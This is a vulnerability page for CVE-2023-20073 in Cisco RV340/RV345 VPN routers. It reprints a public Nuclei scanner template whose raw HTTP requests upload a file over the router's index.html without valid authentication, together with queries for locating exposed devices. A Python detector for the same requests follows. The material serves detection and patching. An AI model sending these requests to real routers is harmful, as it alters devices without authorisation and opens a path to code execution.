CVE-2023-20073: Cisco VPN Routers - Unauthenticated Arbitrary File Upload

Date: 2025-08-01 | Affected software: Cisco VPN Routers | PoC: public

Vulnerability description

A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.

PoC code [public]

id: CVE-2023-20073

info:
  name: Cisco VPN Routers - Unauthenticated Arbitrary File Upload
  author: princechaddha,ritikchaddha
  severity: critical
  description: |
    A vulnerability in the web-based management interface of Cisco RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an unauthenticated, remote attacker to upload arbitrary files to an affected device. This vulnerability is due to insufficient authorization enforcement mechanisms in the context of file uploads. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to upload arbitrary files to the affected device.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
  remediation: |
    Apply the latest security patches provided by Cisco to mitigate this vulnerability.
  reference:
    - https://unsafe.sh/go-173464.html
    - https://gist.github.com/win3zz/076742a4e365b1bba7e2ba0ebea9253f
    - https://github.com/RegularITCat/CVE-2023-20073/tree/main
    - https://nvd.nist.gov/vuln/detail/CVE-2023-20073
    - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-afu-EXxwA65V
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-20073
    cwe-id: CWE-434
    epss-score: 0.89713
    epss-percentile: 0.99542
    cpe: cpe:2.3:o:cisco:rv340_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: cisco
    product: rv340_firmware
    fofa-query:
      - app="CISCO-RV340" || app="CISCO-RV340W" || app="CISCO-RV345" || app="CISCO-RV345P"
      - app="cisco-rv340" || app="cisco-rv340w" || app="cisco-rv345" || app="cisco-rv345p"
  tags: cve2023,cve,xss,fileupload,cisco,unauth,routers,vpn,intrusive
variables:
  html_comment: "<!-- {{randstr}} -->" # Random string as HTML comment to append in response body

http:
  - raw:
      - |
        GET /index.html HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1
        Host: {{Hostname}}
        Authorization: 1
        Content-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf

        --------------------------f6f99e26f3a45adf
        Content-Disposition: form-data; name="pathparam"

        Portal
        --------------------------f6f99e26f3a45adf
        Content-Disposition: form-data; name="fileparam"

        index.html
        --------------------------f6f99e26f3a45adf
        Content-Disposition: form-data; name="file.path"

        index.html
        --------------------------f6f99e26f3a45adf
        Content-Disposition: form-data; name="file"; filename="index.html"
        Content-Type: application/octet-stream

        {{index}}
        {{html_comment}}

        --------------------------f6f99e26f3a45adf--
      - |
        GET /index.html HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: dsl
        name: index
        internal: true
        dsl:
          - body_1
    matchers:
      - type: word
        part: body_3
        words:
          - "{{html_comment}}"
# digest: 4a0a00473045022100ec4162a5bb11983cdb1c16097528bcc595aff266512dd5266c25c54c5170837502200fb6aea9eb7f321135cb4ef4291f83686223ef33290068e48a6b5775d4a9b3de:922c64590222798bb761d5b6d8e72950
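Defender-side example added here (not code from the page or from the Nuclei project): it parses a raw HTTP request captured by a reverse proxy or IDS and reports the indicators visible in the template above: a POST to the ciscosb-file:form-file-upload operation, a bogus Authorization header, pathparam "Portal" and a web asset named in file.path. The host router.example, the boundary XYZ, the 16-character token threshold and the sample request are constructed assumptions.

```python
"""Added detection example (not from the page or the Nuclei project): parse a raw HTTP
request captured by a reverse proxy or IDS and report the indicators the template shows."""
import re

UPLOAD_PATH = "/api/operations/ciscosb-file:form-file-upload"

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (ln.partition(":") for ln in lines[1:])}
    return method, path, headers, body

def multipart_fields(content_type: str, body: str) -> dict:
    """Map each multipart/form-data field to its value (file parts to their filename)."""
    m = re.search(r"boundary=([^;\s]+)", content_type)
    fields = {}
    for part in (body.split("--" + m.group(1)) if m else []):
        head, _, value = part.strip("\r\n").partition("\r\n\r\n")
        name = re.search(r'name="([^"]+)"', head)
        fname = re.search(r'filename="([^"]+)"', head)
        if name:
            fields[name.group(1)] = fname.group(1) if fname else value.strip()
    return fields

def detect_cve_2023_20073(raw: str) -> list:
    """Return indicator strings found in the request; an empty list means no match."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path != UPLOAD_PATH:
        return []
    findings = ["POST to ciscosb-file:form-file-upload operation"]
    token = headers.get("authorization", "")
    if len(token) < 16:  # assumption: a genuine session token is far longer than the PoC's "1"
        findings.append("no credible Authorization token (%r)" % token)
    fields = multipart_fields(headers.get("content-type", ""), body)
    if fields.get("pathparam") == "Portal":
        findings.append("upload targets Portal, which the template's final GET shows is served")
    if fields.get("file.path", "").endswith(".html"):
        findings.append("overwrites web asset %s" % fields["file.path"])
    return findings

SAMPLE_ATTACK = (  # constructed request in the shape of the template's POST
    "POST " + UPLOAD_PATH + " HTTP/1.1\r\nHost: router.example\r\nAuthorization: 1\r\n"
    "Content-Type: multipart/form-data; boundary=XYZ\r\n\r\n"
    '--XYZ\r\nContent-Disposition: form-data; name="pathparam"\r\n\r\nPortal\r\n'
    '--XYZ\r\nContent-Disposition: form-data; name="file.path"\r\n\r\nindex.html\r\n'
    '--XYZ\r\nContent-Disposition: form-data; name="file"; filename="index.html"\r\n'
    "Content-Type: application/octet-stream\r\n\r\n<html></html>\r\n--XYZ--\r\n")
```

Feeding SAMPLE_ATTACK to detect_cve_2023_20073 yields four findings; a GET for /index.html or a POST elsewhere yields none, and a sufficiently long Authorization value drops only the token finding.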